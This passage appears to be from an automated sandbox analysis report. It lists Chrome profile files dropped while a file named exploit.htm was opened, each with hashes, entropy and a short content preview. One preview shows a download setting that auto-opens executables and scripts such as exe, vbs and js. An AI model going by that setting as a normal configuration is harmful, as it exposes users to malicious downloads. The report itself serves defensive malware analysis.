                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:YALtqNTntwCXGDH3qyvz5sTFGsIRLsMkr4dsPtwL:yNTnOCXGDHa+zWeUrFq
                                                                                                                                                            MD5:F2D1713AA88800214C6FB911024D28B3
                                                                                                                                                            SHA1:90204ECDEE062D19F0751E33D3AA5F8772A059C3
                                                                                                                                                            SHA-256:09B50935B1EAFEAFF385649294A9B0D555362274673312953CE30351B7655E4D
                                                                                                                                                            SHA-512:65A11B7A2C4E9315DF6CBBCEEC8B7881E2A8CF54DB04224EF74410B12910429531231D3D204E4375C352D392D9A39870F510C296277846EC34DAB10CA9C2FC60
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"net":{"http_server_properties":{"broken_alternative_services":[{"broken_count":1,"broken_until":"1655364412","host":"clients2.google.com","isolation":[],"port":443,"protocol_str":"quic"}],"servers":[{"isolation":[],"server":"https://www.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://www.google.com","supports_spdy":true},{"isolation":[],"server":"https://ssl.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://fonts.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://apis.google.com","supports_spdy":true},{"isolation":[],"server":"https://play.google.com","supports_spdy":true},{"isolation":[],"server":"https://ogs.google.com","supports_spdy":true},{"isolation":[],"server":"https://www.googleapis.com","supports_spdy":true},{"isolation":[],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"isolation":[],"server":"https://dns.google","supports_spdy":true},{"alternative_service":[{"advertised_versions":[50],"exp

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\9a8e6291-b63a-4adb-94f5-12965367740f.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):17529
                                                                                                                                                            Entropy (8bit):5.574869536368179
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:X7UtwLlDpXb1kXqKf/pUZNCgVLH2HfDmrUkkmps14a8:fLlRb1kXqKf/pUZNCgVLH2HfirUfm61U
                                                                                                                                                            MD5:33875B353A3C1F6BED6AF3F043FA335B
                                                                                                                                                            SHA1:024214471AE54DD1E71BF75913082918D98D0F31
                                                                                                                                                            SHA-256:FDF8E9A8A1A74434059388067BDF5BA6E59B9EF4E311727674F7C0CBCF4526F8
                                                                                                                                                            SHA-512:C5523DAEA84D24C1E02DB6B02F4E5B09644B116CCEA5676D4C7E6589DA18792FC8BD02338494BD6CFF4F4BBAF5257C4467F12CFCB9294E947C11EF7C3A079843
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:tbz2:lz"},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13299837697099911","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_i

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata\computed_hashes.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):11217
                                                                                                                                                            Entropy (8bit):6.069602775336632
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:GbylJnlTwGB7V9Hne4qasKxXItmLG48gcLg/PkI:Gb+nldByaFx4toj8VEPT
                                                                                                                                                            MD5:90F880064A42B29CCFF51FE5425BF1A3
                                                                                                                                                            SHA1:6A3CAE3996E9FFF653A1DDF731CED32B2BE2ACBF
                                                                                                                                                            SHA-256:965203D541E442C107DBC6D5B395168123D0397559774BEAE4E5B9ABC44EF268
                                                                                                                                                            SHA-512:D9CBFCD865356F19A57954F8FD952CAF3D31B354112766C41892D1EF40BD2533682D4EC3F4DA0E59A5397364F67A484B45091BA94E6C69ED18AB681403DFD3F3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"file_hashes":[{"block_hashes":["A+1PYW3V6CJbBuQ7aqrgYhyH3bT8PKyBXp3hN2slpI0=","WSOpQRkYTHjPSlG9Zif2a7TNhy43NDcG1Zg5Nv0UbH0=","jDctR8ImG5KZrQKm4kDjUB7FokSJfjo/pmvFowRVlaY=","LPxhhJiuU0lprt0T6flpS7TkaDg7MocrbmzO65xH6RI=","nZ9zLb2By96AkKXALRM+C0Eu11XUjPiMXEKjiCPdtHE=","wifibc1QfMBN2jrtUtLgsCefvuceTpAatmLvul11RJA=","dHjWlSIIdjj7MWqg3T8MG58RuuqRXk32vqi/13JqEgA=","zd3DV7dbvfNvx1hdhU01fW5ily52DLN0CFL/ADaEeTI=","DpjXcO85FFFY9KJFPkGNfFUtdQIOsGwO5jUckiUwY14=","gqid6l1+mk/6yWgUECRofI9lMipXgXh2jEN2+CxmPE0=","prDB91X2Mmfg/M/txVMITWBmEGbOGjqBTP7CMjYqdHs=","yLPAqV4gqoyS/zFkEt3Cn2j0q2v9QOSthVFfWn8EzCM=","EPQ3jzdrLkAHyvf3920B5Y3aAkO1IJdn/UtbnAmq6T0=","+oOc6ca+ChKUpTu+oa2ZRxRE+wG3QJmuYWEvYCs40NI=","3mBGNAiRlTANEQkqzU3TEi+5wJ0ubR5uwtS4/9OOM7w=","1A9NNawxuhu95H5eThvf1rewJ4QQWhhPNxJXO1C/n68=","E3vWLQxzmj+e5QxYbUscllJ5n0ITpw5JBHV1Kph3/KM=","i3I8ghdTF9c1ZXNBZmvsID+DV4gxBVN27rj9wsMtRpg=","R8B8qYabnMSlLPhrtu0hGYrHn3llsMHqBbi70gkIjEE=","rhlzuEvv2KRAFMms896xFwkNgPrw6WvmgPn6xrBSa2Y=","LAMXv6sRb0VZrY34aVXF3Fftxs

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\000003.log

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):38
                                                                                                                                                            Entropy (8bit):1.8784775129881184
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:FQxlXNQxlX:qTCT
                                                                                                                                                            MD5:51A2CBB807F5085530DEC18E45CB8569
                                                                                                                                                            SHA1:7AD88CD3DE5844C7FC269C4500228A630016AB5B
                                                                                                                                                            SHA-256:1C43A1BDA1E458863C46DFAE7FB43BFB3E27802169F37320399B1DD799A819AC
                                                                                                                                                            SHA-512:B643A8FA75EDA90C89AB98F79D4D022BB81F1F62F50ED4E5440F487F22D1163671EC3AE73C4742C11830214173FF2935C785018318F4A4CAD413AE4EEEF985DF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.f.5................f.5...............

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):372
                                                                                                                                                            Entropy (8bit):5.182016303608359
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:xiuyq2PWXp+N23iKKdK25+Xqx8chI+IFUtqVW61ZmwYVWguRkwOWXp+N23iKKdKI:xByva5KkTXfchI3FUtv8/ZguR5f5KkTM
                                                                                                                                                            MD5:73AEB66AC56DFA09BE9C750F0AA40FDF
                                                                                                                                                            SHA1:128B82AFA50C34A98AA314209E9C74789C288E71
                                                                                                                                                            SHA-256:611DC4106EB222982CEABA8C80C6507810AFA2A7CC77355D9DE23270039164AB
                                                                                                                                                            SHA-512:C00DE75297F363ADD288DFE79B801F7F5E743EAA3D0F9A23845BC54C5966A3E345D5635F850A39F2547E7758989489204149365F0DBBF5E7785820802741577B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2022/06/16-00:22:02.221 1174 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB/MANIFEST-000001.2022/06/16-00:22:02.222 1174 Recovering log #3.2022/06/16-00:22:02.223 1174 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB/000003.log .

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG.old (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):372
                                                                                                                                                            Entropy (8bit):5.182016303608359
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:xiuyq2PWXp+N23iKKdK25+Xqx8chI+IFUtqVW61ZmwYVWguRkwOWXp+N23iKKdKI:xByva5KkTXfchI3FUtv8/ZguR5f5KkTM
                                                                                                                                                            MD5:73AEB66AC56DFA09BE9C750F0AA40FDF
                                                                                                                                                            SHA1:128B82AFA50C34A98AA314209E9C74789C288E71
                                                                                                                                                            SHA-256:611DC4106EB222982CEABA8C80C6507810AFA2A7CC77355D9DE23270039164AB
                                                                                                                                                            SHA-512:C00DE75297F363ADD288DFE79B801F7F5E743EAA3D0F9A23845BC54C5966A3E345D5635F850A39F2547E7758989489204149365F0DBBF5E7785820802741577B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2022/06/16-00:22:02.221 1174 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB/MANIFEST-000001.2022/06/16-00:22:02.222 1174 Recovering log #3.2022/06/16-00:22:02.223 1174 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB/000003.log .

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Provider Cache

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):716
                                                                                                                                                            Entropy (8bit):5.190378637340728
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:fu3iShkQRau1W2tV3JJ4mcUS4ewh1N0geKqfRx+Y0tKBk778B/xgskZBa9sNiyDj:giSyQHWa38r4f1NDxqfRutIY78BJgsk/
                                                                                                                                                            MD5:D071A6DC817B291CA672EC1AEDFEA181
                                                                                                                                                            SHA1:66B309B7DAAC17726440A6433A35E798E1FCF6A7
                                                                                                                                                            SHA-256:0E5512D06FFBD176B299F57E9148980FA6E80EF46952BB273BE25E2FA513BF4F
                                                                                                                                                            SHA-512:03155F7E9A9D389B0ACF4AE72BA9E74678BCE2DA1F174E0302096565119E66417942A093A874F54984778364EB9054DCB1013C897296F7EF06976FED5A2C9D81
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:............"S....c..desktop..disabled..exploit..file..good..user..htm..macros..thing..users..we*........c......desktop......disabled......exploit......file......good......user......htm......macros......thing......users......we..2.........a..........b........c.........d...........e.............f........g.........h..........i...........k........l..........m.........n........o...........p.........r..........s...........t...........u........w........x........z...:n..............................................................................................................Bo...k...... .......**file:///C:/Users/user/Desktop/exploit.htm2.Good thing we disabled macros:...............J...............'.......

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Persistent State (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1880
                                                                                                                                                            Entropy (8bit):4.898536033155538
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:YALtqNTntwCXGDH3qyvz5sTFGsIRLsMkr4dsPtwL:yNTnOCXGDHa+zWeUrFq
                                                                                                                                                            MD5:F2D1713AA88800214C6FB911024D28B3
                                                                                                                                                            SHA1:90204ECDEE062D19F0751E33D3AA5F8772A059C3
                                                                                                                                                            SHA-256:09B50935B1EAFEAFF385649294A9B0D555362274673312953CE30351B7655E4D
                                                                                                                                                            SHA-512:65A11B7A2C4E9315DF6CBBCEEC8B7881E2A8CF54DB04224EF74410B12910429531231D3D204E4375C352D392D9A39870F510C296277846EC34DAB10CA9C2FC60
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"net":{"http_server_properties":{"broken_alternative_services":[{"broken_count":1,"broken_until":"1655364412","host":"clients2.google.com","isolation":[],"port":443,"protocol_str":"quic"}],"servers":[{"isolation":[],"server":"https://www.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://www.google.com","supports_spdy":true},{"isolation":[],"server":"https://ssl.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://fonts.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://apis.google.com","supports_spdy":true},{"isolation":[],"server":"https://play.google.com","supports_spdy":true},{"isolation":[],"server":"https://ogs.google.com","supports_spdy":true},{"isolation":[],"server":"https://www.googleapis.com","supports_spdy":true},{"isolation":[],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"isolation":[],"server":"https://dns.google","supports_spdy":true},{"alternative_service":[{"advertised_versions":[50],"exp

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):4898
                                                                                                                                                            Entropy (8bit):4.965051882371517
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:nHCNa6ZH1pcKICJok0JCKL8vAbOTQVuwn:nHCoi1pcT4KoS
                                                                                                                                                            MD5:C3FEBCD87583AD090650ED09AF2BD871
                                                                                                                                                            SHA1:194B176AE39EE675C813952F38CD0B86B8EB767F
                                                                                                                                                            SHA-256:8F2D116ED49CBFB829BF8B37F7DE57F2ADCF029DBED8CA43B73FCE1FB0F406E4
                                                                                                                                                            SHA-512:F443E29D46C5F5748816CB1D6F1BA74E53CE4C4528B5F8D469BAC36870338B8CC0DE620A20B427DBE16CFFDA26EEACF2AAC9730719C96963AA45B38F738056C9
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"account_id_migration_state":2,"account_tracker_service_last_update":"13299837697847611","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245951692116406","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","7355378"],"daily_received_length":["0","0","0","0","0","0","0","

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):19793
                                                                                                                                                            Entropy (8bit):5.5645935890080995
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:X7UtZLlDpXb1kXqKf/pUZNCgVLH2HfDmrUqHGXtmmpD14w:wLlRb1kXqKf/pUZNCgVLH2HfirU6GdmE
                                                                                                                                                            MD5:D467A835189BE9588A894366C2AFB80B
                                                                                                                                                            SHA1:F485973BA2A8860BF295BDEA66308A67F5C6A188
                                                                                                                                                            SHA-256:4BDBBF953549E0C24E8D0E1EDDF15C08F7E315ED8B0761681F1FDA3E1ABAC26B
                                                                                                                                                            SHA-512:4FD9E5C5BF1ADB4D04A0F36FE6AC9DBFA4588424770C5C5AF61CBB3F60B74E26579618246E7678F7DCC9E965488853341467E453E2DB58444D4B5FDA01F254C8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:tbz2:lz"},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13299837697099911","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_i

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\4209d767-871b-4a94-8545-161148c1f1df.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):420
                                                                                                                                                            Entropy (8bit):4.990569549676486
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:YHpoNXR8+eq7JdV5qQlsDHF4xj70PpqQEsDHF4R8HLJ2AVQBR70S7PMVKJw1K3Kk:YHO8sdBsB6MAsBdLJlyH7E4f3K3U
                                                                                                                                                            MD5:E284CCD024B4A723E862BEF1230760F0
                                                                                                                                                            SHA1:B8076FF6A3FBDAC53426746764BA40BFA1A491CA
                                                                                                                                                            SHA-256:BD5466375AD97AF8BE9C6B54AA3781E531DFCCC5B7F005FA2E096BE9AC97D6E7
                                                                                                                                                            SHA-512:9BB1D602984CD5679025949DE887086C098CC3A9B24F3410B858491547EC16B2427606CF0B2C85D7F619021CEDFEDB3011AE1F22AFE5AA16FB5AAF55F2FDE210
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[50],"expiration":"13248543490879170","port":443,"protocol_str":"quic"},{"advertised_versions":[73],"expiration":"13248543490879171","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://dns.google","supports_spdy":true}],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"2G"}}}

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\4a64c5b0-4134-42a3-ade2-28be8b61b6ac.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):420
                                                                                                                                                            Entropy (8bit):4.985305467053914
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:YHpoNXR8+eq7JdV5qQlsDHF4xj70PpqQEsDHF4R8HLJ2AVQBR70S7PMVKJw1K3Ky:YHO8sdBsB6MAsBdLJlyH7E4f3K33y
                                                                                                                                                            MD5:C401B619D9D8E0ADABC25A47EE49CFBA
                                                                                                                                                            SHA1:C9D3B816DD3FBCD98E9C0A32CEC7B501EFC0BBDA
                                                                                                                                                            SHA-256:8F5D75F5EF9876E8D30CE477509F735B50C4D87DBEDB433BE8EDBE6D4B3CB82F
                                                                                                                                                            SHA-512:BC12F16CB95CB0AD708C6BBD005EF863A8552613E612F1084086E0F8262752E1B5144D044F0D141CE8462CC33343C36B517A5CC778751680485D8F88FB51B862
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[50],"expiration":"13248543490879170","port":443,"protocol_str":"quic"},{"advertised_versions":[73],"expiration":"13248543490879171","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://dns.google","supports_spdy":true}],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\GPUCache\data_1

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):270336
                                                                                                                                                            Entropy (8bit):0.0012471779557650352
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                            MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                            SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                            SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                            SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Network Persistent State (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):420
                                                                                                                                                            Entropy (8bit):4.985305467053914
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:YHpoNXR8+eq7JdV5qQlsDHF4xj70PpqQEsDHF4R8HLJ2AVQBR70S7PMVKJw1K3Ky:YHO8sdBsB6MAsBdLJlyH7E4f3K33y
                                                                                                                                                            MD5:C401B619D9D8E0ADABC25A47EE49CFBA
                                                                                                                                                            SHA1:C9D3B816DD3FBCD98E9C0A32CEC7B501EFC0BBDA
                                                                                                                                                            SHA-256:8F5D75F5EF9876E8D30CE477509F735B50C4D87DBEDB433BE8EDBE6D4B3CB82F
                                                                                                                                                            SHA-512:BC12F16CB95CB0AD708C6BBD005EF863A8552613E612F1084086E0F8262752E1B5144D044F0D141CE8462CC33343C36B517A5CC778751680485D8F88FB51B862
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[50],"expiration":"13248543490879170","port":443,"protocol_str":"quic"},{"advertised_versions":[73],"expiration":"13248543490879171","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://dns.google","supports_spdy":true}],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\49e038e6-1365-429c-94f4-db117dc07b92.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:modified
                                                                                                                                                            Size (bytes):420
                                                                                                                                                            Entropy (8bit):4.954960881489904
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:YHO8sdvBVSsB6M/BVSsBdLJlyH7E4f3K33y:YXsdvjX6gjXdL3yH7n/iy
                                                                                                                                                            MD5:F4FEFEEEC722772F9DC0FCE1B52D79B5
                                                                                                                                                            SHA1:00EECFA3B37113D30E7D43BE4383C540F3D93D4D
                                                                                                                                                            SHA-256:D33E13C12004A700F246D8C73709114A881609D658E045D54DE36874728D07F0
                                                                                                                                                            SHA-512:41E61EC89366800FD5F4DD704E53B47DE29411B9088B46349A0A350758D08569C14DCC70CF8D6A6FE6D049CB6D32F2B091153E8148A1B5857BD7AF13492071BE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[50],"expiration":"13248543498399332","port":443,"protocol_str":"quic"},{"advertised_versions":[73],"expiration":"13248543498399332","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://dns.google","supports_spdy":true}],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\data_1

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):270336
                                                                                                                                                            Entropy (8bit):0.0012471779557650352
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                            MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                            SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                            SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                            SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network Persistent State (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):420
                                                                                                                                                            Entropy (8bit):4.954960881489904
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:YHO8sdvBVSsB6M/BVSsBdLJlyH7E4f3K33y:YXsdvjX6gjXdL3yH7n/iy
                                                                                                                                                            MD5:F4FEFEEEC722772F9DC0FCE1B52D79B5
                                                                                                                                                            SHA1:00EECFA3B37113D30E7D43BE4383C540F3D93D4D
                                                                                                                                                            SHA-256:D33E13C12004A700F246D8C73709114A881609D658E045D54DE36874728D07F0
                                                                                                                                                            SHA-512:41E61EC89366800FD5F4DD704E53B47DE29411B9088B46349A0A350758D08569C14DCC70CF8D6A6FE6D049CB6D32F2B091153E8148A1B5857BD7AF13492071BE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[50],"expiration":"13248543498399332","port":443,"protocol_str":"quic"},{"advertised_versions":[73],"expiration":"13248543498399332","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://dns.google","supports_spdy":true}],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}

                                                                                                                                                            C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\a5e1b249-4595-42a1-9ef0-54478bd42563.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
